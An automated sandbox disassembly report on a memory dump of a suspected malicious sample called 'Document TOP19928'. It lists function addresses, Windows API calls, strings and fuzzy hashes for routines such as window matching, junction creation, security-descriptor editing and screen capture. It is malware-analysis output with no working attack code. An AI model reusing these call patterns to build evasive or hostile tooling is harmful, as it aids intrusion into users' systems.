Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: b923d95c00d2034c381cd13fffc1f2683b039a0434f1cd48768425cdf634cb2c
Instruction ID: 8a3fe453eaaed2cd7fbe7a3ebd5b373001cf217bada8273096c77e95c9530799
Opcode Fuzzy Hash: b923d95c00d2034c381cd13fffc1f2683b039a0434f1cd48768425cdf634cb2c
Instruction Fuzzy Hash: 70A1F271204726EFDB18DF24D884BAAF7E8FF44315F104629FA99C2191D734E985CB92

Function 0082B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0082B3DB
_wcscmp.LIBCMT ref: 0082B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0082B414
CharUpperBuffW.USER32(?,00000000), ref: 0082B431
_wcscmp.LIBCMT ref: 0082B44F
_wcsstr.LIBCMT ref: 0082B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0082B498
_wcscmp.LIBCMT ref: 0082B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0082B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0082B518
_wcscmp.LIBCMT ref: 0082B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0082B550
GetWindowRect.USER32(00000004,?), ref: 0082B5B9

Strings

ThumbnailClass, xrefs: 0082B4A3, 0082B523
@, xrefs: 0082B3BC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: f91fd282faac317fde46d4196e9ac6e3efe86f1fdf990ce4305d77d01e7287b6
Instruction ID: b404679af5871016edbdb453a2a75f1e4b32d0d27bc665830e17806d284347f8
Opcode Fuzzy Hash: f91fd282faac317fde46d4196e9ac6e3efe86f1fdf990ce4305d77d01e7287b6
Instruction Fuzzy Hash: CA81C07100931A9BDB04DF10E985FAA7BE8FF54314F088569FD85CA192DB38DD85CB61

Function 0082B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0082B23F

Strings

CLASSNAME=, xrefs: 0082B27C
[LAST, xrefs: 0082B2EC
ACTIVE, xrefs: 0082B21A
[REGEXPTITLE:, xrefs: 0082B267
REGEXP=, xrefs: 0082B254
LAST, xrefs: 0082B204
[HANDLE:, xrefs: 0082B24B
[CLASS:, xrefs: 0082B28F
ALL, xrefs: 0082B2D3
[ALL, xrefs: 0082B2E5
[ACTIVE, xrefs: 0082B22C
HANDLE=, xrefs: 0082B238

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 56c0a73f6978f0e18b033495af458c657ce45fdf52bb894f4586fc5cf6a8c33d
Instruction ID: 707de7713310faa2b65cd2061a77a36918539135c9dfd48c56c16a0dbab07c5c
Opcode Fuzzy Hash: 56c0a73f6978f0e18b033495af458c657ce45fdf52bb894f4586fc5cf6a8c33d
Instruction Fuzzy Hash: CF318930A04319E6DB14FAA0DD47ABE77B8FF20750F64012AF4A2B12D2FF696E44C651

Function 0082C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0082C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0082C4E6
SetWindowTextW.USER32(?,?), ref: 0082C4FD
GetDlgItem.USER32(?,000003EA), ref: 0082C512
SetWindowTextW.USER32(00000000,?), ref: 0082C518
GetDlgItem.USER32(?,000003E9), ref: 0082C528
SetWindowTextW.USER32(00000000,?), ref: 0082C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0082C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0082C569
GetWindowRect.USER32(?,?), ref: 0082C572
SetWindowTextW.USER32(?,?), ref: 0082C5DD
GetDesktopWindow.USER32 ref: 0082C5E3
GetWindowRect.USER32(00000000), ref: 0082C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0082C636
GetClientRect.USER32(?,?), ref: 0082C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0082C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0082C693

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 64da35dd0ded3efa6f4ff2edea346b50425979d93f38b26fcea693045e6a4cd0
Instruction ID: f986e20b5ab16262432010e9aad975299b8016124eea9770a6bf95782ebcd2e4
Opcode Fuzzy Hash: 64da35dd0ded3efa6f4ff2edea346b50425979d93f38b26fcea693045e6a4cd0
Instruction Fuzzy Hash: EC515A70900719AFDB20AFA8DE89B6FBBF5FF04705F004928E686E25A1D775E944CB50

Function 0085A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0085A4C8
DestroyWindow.USER32(?,?), ref: 0085A542

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0085A5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0085A5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A5F1
DestroyWindow.USER32(00000000), ref: 0085A613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007D0000,00000000), ref: 0085A64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0085A663
GetDesktopWindow.USER32 ref: 0085A67C
GetWindowRect.USER32(00000000), ref: 0085A683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0085A69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0085A6B3

Part of subcall function 007D25DB: GetWindowLongW.USER32(?,000000EB), ref: 007D25EC

Strings

tooltips_class32, xrefs: 0085A5B5, 0085A643
0, xrefs: 0085A4DE

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: fd6e5a87aee9307880bc73e94bd625a9017edc60e817bbf9d9c9e090accd3226
Instruction ID: 1f1dd210656bcb20bc23a0ce54ce6265d135af4507635025eb9493ab4c1952c9
Opcode Fuzzy Hash: fd6e5a87aee9307880bc73e94bd625a9017edc60e817bbf9d9c9e090accd3226
Instruction Fuzzy Hash: 36719C74140205AFD724DF28DC89F667BE6FBA8305F08462DF985D72A1E774E90ACB12

Function 00854619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 008546AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008546F6

Strings

UNCHECK, xrefs: 008548D2
EXPAND, xrefs: 008547A8
ISCHECKED, xrefs: 00854879
GETTEXT, xrefs: 00854849
SELECT, xrefs: 008548A7
CHECK, xrefs: 00854716
EXISTS, xrefs: 0085475F
GETTOTALCOUNT, xrefs: 008546DD
GETSELECTED, xrefs: 00854806
GETITEMCOUNT, xrefs: 008547D8
COLLAPSE, xrefs: 0085473C

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: cd723f47bdef5e658a40cbb57f9e8f60a503de0220fa7d4eb0362bc83540ff54
Instruction ID: 1bf1b7738f0f6b5bed43b8f14fb1c7054025130b6f170b46216a42638bc303be
Opcode Fuzzy Hash: cd723f47bdef5e658a40cbb57f9e8f60a503de0220fa7d4eb0362bc83540ff54
Instruction Fuzzy Hash: A2917E34204315DBCB14EF20C455A6ABBA1FF95318F00946DBD969B3A3DB34ED89CB81

Function 0085BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0085BB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00859431), ref: 0085BBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085BC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0085BC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0085BC7D
FreeLibrary.KERNEL32(?), ref: 0085BC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0085BC99
DestroyCursor.USER32(?), ref: 0085BCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0085BCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0085BCD1

Part of subcall function 007F313D: __wcsicmp_l.LIBCMT ref: 007F31C6

Strings

.dll, xrefs: 0085BB27
.icl, xrefs: 0085BAE4
.exe, xrefs: 0085BB04

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: e5b6b559aa61355dafccdb29d3a51e7b0eebea6195994515d35495e8bc30bfa0
Instruction ID: b5bb297a45a541d33cf194421e9637435944df3e7489fd9ca2fb99247816bdd5
Opcode Fuzzy Hash: e5b6b559aa61355dafccdb29d3a51e7b0eebea6195994515d35495e8bc30bfa0
Instruction Fuzzy Hash: 3A61E071500619FAEB14DF64CC49BBA7BA8FB18722F104119FE15D61C1DB78AD88DBA0

Function 0083A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 007D9997: __itow.LIBCMT ref: 007D99C2
Part of subcall function 007D9997: __swprintf.LIBCMT ref: 007D9A0C

CharLowerBuffW.USER32(?,?), ref: 0083A636
GetDriveTypeW.KERNEL32 ref: 0083A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083A730

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Strings

set cd door , xrefs: 0083A6D1
open , xrefs: 0083A692
type cdaudio alias cd wait, xrefs: 0083A6AE
wait, xrefs: 0083A6ED
close, xrefs: 0083A63C
open, xrefs: 0083A65D
close cd wait, xrefs: 0083A71B
closed, xrefs: 0083A64A, 0083A653

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 087f8e5d701b4abea75f6a5aa1522d2354a34f51b34a33db3d5867079f572bc9
Instruction ID: 29b27bf7d9593603611989b532bf58ce3d748e22f19d1d0553fed5e8fc69ed80
Opcode Fuzzy Hash: 087f8e5d701b4abea75f6a5aa1522d2354a34f51b34a33db3d5867079f572bc9
Instruction Fuzzy Hash: CA513B711042059FC708EF20C88596AB7F8FF94718F04895EF89597391EB35EE0ACB92

Function 0083A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0083A47A
__swprintf.LIBCMT ref: 0083A49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 0083A4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0083A4FE
_memset.LIBCMT ref: 0083A51D
_wcsncpy.LIBCMT ref: 0083A559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0083A58E
CloseHandle.KERNEL32(00000000), ref: 0083A599
RemoveDirectoryW.KERNEL32(?), ref: 0083A5A2
CloseHandle.KERNEL32(00000000), ref: 0083A5AC

Strings

\, xrefs: 0083A4B2
:, xrefs: 0083A4BD
\??\%s, xrefs: 0083A496

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c1b40979b114cbc7d575e7e3c9537365e7458696e9ceb2a74f461eda8dcac33f
Instruction ID: 505b58242af2fc64dbbfd41bab2a3ea6dac4360021bb1b78dc5f33929b4ec729
Opcode Fuzzy Hash: c1b40979b114cbc7d575e7e3c9537365e7458696e9ceb2a74f461eda8dcac33f
Instruction Fuzzy Hash: 9E3190B5500209ABDB219FA0DC49FEB77BCFF88701F1041B6FA08D6161EB7496448B65

Function 0083DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0083DC7B
_wcscat.LIBCMT ref: 0083DC93
_wcscat.LIBCMT ref: 0083DCA5
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0083DCBA
SetCurrentDirectoryW.KERNEL32(?), ref: 0083DCCE
GetFileAttributesW.KERNEL32(?), ref: 0083DCE6
SetFileAttributesW.KERNEL32(?,00000000), ref: 0083DD00
SetCurrentDirectoryW.KERNEL32(?), ref: 0083DD12

Strings

*.*, xrefs: 0083DD51

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7341dacca3d5871ff91f61323f69c97a525cb852b11204f9212e30d1e57ada7f
Instruction ID: ed73fece3046cf0214bb03e053caaf688354339a86ca37b9d4067b919f6a9da1
Opcode Fuzzy Hash: 7341dacca3d5871ff91f61323f69c97a525cb852b11204f9212e30d1e57ada7f
Instruction Fuzzy Hash: 2481A0725043459FCB20EF24D8859AAB7E8FFC8314F19882EF989C7251E734E945CB92

Function 008283F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00828766
Part of subcall function 0082874A: GetLastError.KERNEL32(?,0082822A,?,?,?), ref: 00828770
Part of subcall function 0082874A: GetProcessHeap.KERNEL32(00000008,?,?,0082822A,?,?,?), ref: 0082877F
Part of subcall function 0082874A: RtlAllocateHeap.NTDLL(00000000,?,0082822A), ref: 00828786
Part of subcall function 0082874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0082879D

Part of subcall function 008287E7: GetProcessHeap.KERNEL32(00000008,00828240,00000000,00000000,?,00828240,?), ref: 008287F3
Part of subcall function 008287E7: RtlAllocateHeap.NTDLL(00000000,?,00828240), ref: 008287FA
Part of subcall function 008287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00828240,?), ref: 0082880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00828458
_memset.LIBCMT ref: 0082846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0082848C
GetLengthSid.ADVAPI32(?), ref: 0082849D
GetAce.ADVAPI32(?,00000000,?), ref: 008284DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 008284F6
GetLengthSid.ADVAPI32(?), ref: 00828513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00828522
RtlAllocateHeap.NTDLL(00000000), ref: 00828529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0082854A
CopySid.ADVAPI32(00000000), ref: 00828551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00828582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008285A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 008285BC

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 1af78bb7289d63e1c292a9ec64c2319ac1ecb69b5f9457e44c7d415ddf4a3956
Instruction ID: 3d5fef4c25dfb77e3e606c3b56145301809a0c9d69fcd6053b6d96aa554dabb3
Opcode Fuzzy Hash: 1af78bb7289d63e1c292a9ec64c2319ac1ecb69b5f9457e44c7d415ddf4a3956
Instruction Fuzzy Hash: C4615971901219EFDF00DFA4ED44AAEBBB9FF04301F088169E915E7291DB389A44CF60

Function 0084762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008476A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 008476AE
CreateCompatibleDC.GDI32(?), ref: 008476BA
SelectObject.GDI32(00000000,?), ref: 008476C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0084771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00847757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0084777B
SelectObject.GDI32(00000006,?), ref: 00847783
DeleteObject.GDI32(?), ref: 0084778C
DeleteDC.GDI32(00000006), ref: 00847793
ReleaseDC.USER32(00000000,?), ref: 0084779E

Strings

(, xrefs: 00847723

Memory Dump Source

Source File: 00000000.00000002.2013315930.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.2013299379.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013315930.0000000000903000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013464644.0000000000909000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2013480252.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_Document TOP19928.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: e4196f89c58551a433fdb8591a22522580c20f584a4a7b95c8403532c8a7e317
Instruction ID: a92fbbcc3a6a0718aad1642ddeeaacc760fe42165c5b8e670150cbce07cec1ae
Opcode Fuzzy Hash: e4196f89c58551a433fdb8591a22522580c20f584a4a7b95c8403532c8a7e317
Instruction Fuzzy Hash: D6514875904709EFCB15CFA8CC84EAEBBB9FF48310F14852DFA4A97251D735A8408B60

Function 0083A0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,0085FB78), ref: 0083A0FC

Part of subcall function 007D7F41: _memmove.LIBCMT ref: 007D7F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0083A11E
__swprintf.LIBCMT ref: 0083A177
__swprintf.LIBCMT ref: 0083A190
_wprintf.LIBCMT ref: 0083A246
_wprintf.LIBCMT ref: 0083A264

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 0083A241
Line %d (File "%s"):, xrefs: 0083A171, 0083A18A
